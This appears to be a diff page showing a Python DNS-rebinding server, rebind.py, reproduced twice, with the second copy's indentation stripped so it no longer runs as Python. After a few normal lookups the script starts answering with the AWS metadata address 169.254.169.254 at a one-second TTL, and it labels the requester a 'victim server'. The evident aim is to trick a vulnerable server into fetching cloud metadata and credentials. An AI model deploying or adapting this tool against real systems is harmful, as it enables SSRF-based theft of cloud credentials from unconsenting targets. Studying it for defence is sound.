h0ng10 · February 25, 2020 15:40
diff --git a/rebind.py b/rebind.py
 #!env python3
 import socket
 from time import time
 import datetime


 class DNSQuery:
 	def __init__(self, data):
 		self.data = data
 		self.domain = ''
 		self.qtype = 0

 		opcode = (ord(data[2]) >> 3) & 15
 		if opcode == 0:
 			ini = 12
 			lon = ord(data[ini])
 			while lon != 0:
 				self.domain += data[ini+1:ini+lon+1] + '.'
 				ini += lon + 1
 				lon = ord(data[ini])
 			self.qtype = ord(data[12+len(self.domain)+2])

 	def reply(self, ip):
 		packet = ''
 		if self.domain:
 			packet += self.data[:2] + '\x81\x80'
 			packet += self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00'
 			packet += self.data[12:12+len(self.domain)+5] # original question
 			packet += '\xc0\x0c'
 			packet += '\x00\x01\x00\x01\x00\x00\x00\x01\x00\x04' # response type, ttl, resource data length (4 bytes)
 			packet += ''.join(chr(int(x)) for x in ip.split('.'))
 		return packet


 '''
 Prints positive message (in green)
 '''
 def message_positiv(message):
    print('\033[92m' +"[+] " + message + '\033[0m')


 '''
 Prints info message
 '''
 def message_info(message):
    print("[*] " + message)


 if __name__ == '__main__':
 	udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
 	dnsPort = 53
 	udp.bind(('',dnsPort))
 	message_info("Binding DNS server on Port: " + str(dnsPort))
 	
 	numRequests = 0
 	ip = "159.69.34.199" # Default IP (no AWS)
 	try:
 		while 1:
 			data, addr = udp.recvfrom(1024)
 			p = DNSQuery(data)
 			# only IN A questions are supported
 			if p.domain and p.qtype == 1:
 				if numRequests > 2:
 				# if addr[0] == "127.0.0.1": # if request from victim IP
 					message_positiv(str(datetime.datetime.now()) + " ->  Got request from victim server. IP: " + str(addr[0]))				
 					ip = "169.254.169.254" # aws meta
 				else:
 					numRequests = numRequests + 1
 					message_info("Got request from IP: " + str(addr[0]))
 					message_info("numRequest: " + str(numRequests))
 				
 				message_info("	" + p.domain + " -> " + str(ip))
 				udp.sendto(p.reply(ip), addr)

 	except KeyboardInterrupt:
 		udp.close()
	#!env python3
	import socket
	from time import time
	import datetime


	class DNSQuery:
	def __init__(self, data):
	self.data = data
	self.domain = ''
	self.qtype = 0

	opcode = (ord(data[2]) >> 3) & 15
	if opcode == 0:
	ini = 12
	lon = ord(data[ini])
	while lon != 0:
	self.domain += data[ini+1:ini+lon+1] + '.'
	ini += lon + 1
	lon = ord(data[ini])
	self.qtype = ord(data[12+len(self.domain)+2])

	def reply(self, ip):
	packet = ''
	if self.domain:
	packet += self.data[:2] + '\x81\x80'
	packet += self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00'
	packet += self.data[12:12+len(self.domain)+5] # original question
	packet += '\xc0\x0c'
	packet += '\x00\x01\x00\x01\x00\x00\x00\x01\x00\x04' # response type, ttl, resource data length (4 bytes)
	packet += ''.join(chr(int(x)) for x in ip.split('.'))
	return packet


	'''
	Prints positive message (in green)
	'''
	def message_positiv(message):
	print('\033[92m' +"[+] " + message + '\033[0m')


	'''
	Prints info message
	'''
	def message_info(message):
	print("[*] " + message)


	if __name__ == '__main__':
	udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
	dnsPort = 53
	udp.bind(('',dnsPort))
	message_info("Binding DNS server on Port: " + str(dnsPort))

	numRequests = 0
	ip = "159.69.34.199" # Default IP (no AWS)
	try:
	while 1:
	data, addr = udp.recvfrom(1024)
	p = DNSQuery(data)
	# only IN A questions are supported
	if p.domain and p.qtype == 1:
	if numRequests > 2:
	# if addr[0] == "127.0.0.1": # if request from victim IP
	message_positiv(str(datetime.datetime.now()) + " -> Got request from victim server. IP: " + str(addr[0]))
	ip = "169.254.169.254" # aws meta
	else:
	numRequests = numRequests + 1
	message_info("Got request from IP: " + str(addr[0]))
	message_info("numRequest: " + str(numRequests))

	message_info(" " + p.domain + " -> " + str(ip))
	udp.sendto(p.reply(ip), addr)

	except KeyboardInterrupt:
	udp.close()